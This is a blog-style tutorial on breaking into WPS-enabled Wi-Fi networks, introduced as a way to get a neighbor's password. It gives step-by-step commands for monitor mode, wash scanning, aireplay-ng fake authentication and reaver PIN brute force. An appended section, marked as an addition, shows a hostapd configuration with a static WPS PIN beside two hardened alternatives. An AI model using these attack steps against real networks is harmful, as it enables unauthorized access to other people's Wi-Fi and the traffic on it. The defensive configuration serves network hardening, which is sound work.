EXPLOITING WPS: Hack a WPS-enabled WIFI using REAVER and FAKE AUTHENTICATION
Hey Folks, whenever a newbie hacker starts learning about hacking, the very first thing they may try is to get their neighbor’s WIFI password. With that being said, let’s jump in and learn: What is WPS? How does it work? How can a WIFI password be obtained by exploiting WPS?
WARNING: The sole purpose of this write-up is to educate readers about hacking and security concepts. Neither the writer nor the publisher encourages anyone to use the knowledge shared here for unethical purposes.
In this blog we are going to learn how to exploit a feature present in modern routers, WPS (WIFI Protected Setup).

What is WPS?
WPS stands for WIFI Protected Setup. It is a feature used together with WPA and WPA2 (WIFI Protected Access and WIFI Protected Access II).
It is a wireless security standard that aims to make establishing a connection with a wireless access point using WPA/WPA2 encryption faster and easier.
NOTE: WPS works only with wireless access points that use WPA/WPA2 encryption.
HOW DOES WPS WORK?
WPS is a wireless security standard that lets a client connect to an access point without using the actual PASSWORD.
It has two modes of operation:
- PIN
- PBC (Push Button Configuration)

When the access point is set up to use PIN-based authentication, the user needs to set a PIN which will be used for authentication. A user who wants to connect to the network can then use this WPS PIN instead of the actual password.
However, when PBC mode is used, the user has to push a button on both the client and the access point; the button can be virtual or physical. When it is pressed, the access point switches to discovery mode and authenticates the device trying to connect. On most devices, discovery mode turns off as soon as the new device connects or after a time limit set by the manufacturer (normally 2 minutes or less).
Exploiting WPS
Now it’s time to jump to the fun stuff: how to exploit WPS and gain access to a wireless network without the password. But before we dive in, here’s a note for you.
NOTE: This method will only work if WPS is enabled on the access point and it is configured not to use PBC, which means authentication is done using the WPS PIN.
REQUIREMENTS: A KALI LINUX machine and a wireless network adapter that supports monitor mode.
A WPS PIN is an eight-digit number, which is not a very large keyspace. With a modern computer we can try all the possible WPS PINs within a short time, which makes WPS vulnerable to brute-force attacks. Once we have the correct WPS PIN, it can be used to recover the actual password.
To do this process we need to follow a sequence of steps which are:
Step 1: Switch to monitor mode on wireless adapter
To switch to monitor mode, run the following commands in a Linux terminal:
ifconfig [Name of network interface] down
iwconfig [Name of network interface] mode monitor
ifconfig [Name of network interface] up
Step 2: Find Access Points with WPS enabled
To find access points with WPS enabled, run the following command in a Linux terminal:
wash --interface [Name of network interface]
Step 3: Getting associated with target network using fake authentication attack
To launch a fake authentication attack, run the following command in a Linux terminal:
aireplay-ng --fakeauth 30 -a [Target device’s MAC] -h [Network interface’s MAC] [Name of network interface]
“The 30 after --fakeauth means the authentication will be re-sent every 30 seconds. Keep this running in a separate terminal.”
Step 4: Brute force WPS pins using REAVER
To brute force WPS PINs, run the following command in a new Linux terminal while fakeauth keeps running in the other one:
reaver --bssid [Target device’s MAC] --channel [Target device’s channel] --interface [Name of network interface] -vvv --no-associate
“-vvv is for verbose output; --no-associate tells reaver not to associate with the target network.”
It is better not to let reaver associate with the target network, because it usually fails at that; moreover, we are already associated with the target network through fake authentication. After successful completion of the attack, reaver returns the correct WPS PIN and the actual password.
NOTE: In case reaver doesn’t work and returns an error, try its older version, as the current version contains some unfixed bugs.
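The NOTE in the exploitation section says this attack only applies when WPS is enabled in PIN mode. As an added example that is not part of the original post, here is what that distinction looks like on the access-point side in a hostapd configuration: the weak setting with a static AP PIN beside two corrected alternatives (WPS off, or push-button only). The hostapd keys wps_state, ap_pin, ap_setup_locked and config_methods are real; the SSID, passphrase and PIN values are constructed placeholders.

```ini
# hostapd.conf fragments (added example; SSID, passphrase and PIN are constructed placeholders).
# hostapd does not strip trailing comments, so every comment sits on its own line.

# --- Weak: WPS enabled with a static AP PIN, the exact mode a WPS PIN brute force targets ---
ssid=example-net
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=CHANGE-ME-long-random-passphrase
# 2 = WPS enabled and configured
wps_state=2
# A static 8-digit PIN gives an external registrar a small keyspace to guess
ap_pin=12345670
# label/display/keypad advertise the PIN path to clients
config_methods=label display push_button keypad

# --- Corrected, option A: WPS disabled altogether ---
# 0 = WPS disabled (the hostapd default); remove ap_pin and config_methods
wps_state=0

# --- Corrected, option B: push-button onboarding only, no PIN ---
wps_state=2
# Refuse configuration by new external registrars
ap_setup_locked=1
# Only PBC methods: no label/display/keypad, so no PIN path is advertised
config_methods=push_button virtual_push_button
# No ap_pin line: without it there is no AP PIN for a registrar to guess
```

Option A removes the attack surface completely; option B keeps the convenience of PBC while removing the PIN mode that reaver depends on.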
If you are interested in learning more about cybersecurity, follow i.m.pratikdabhi on Instagram.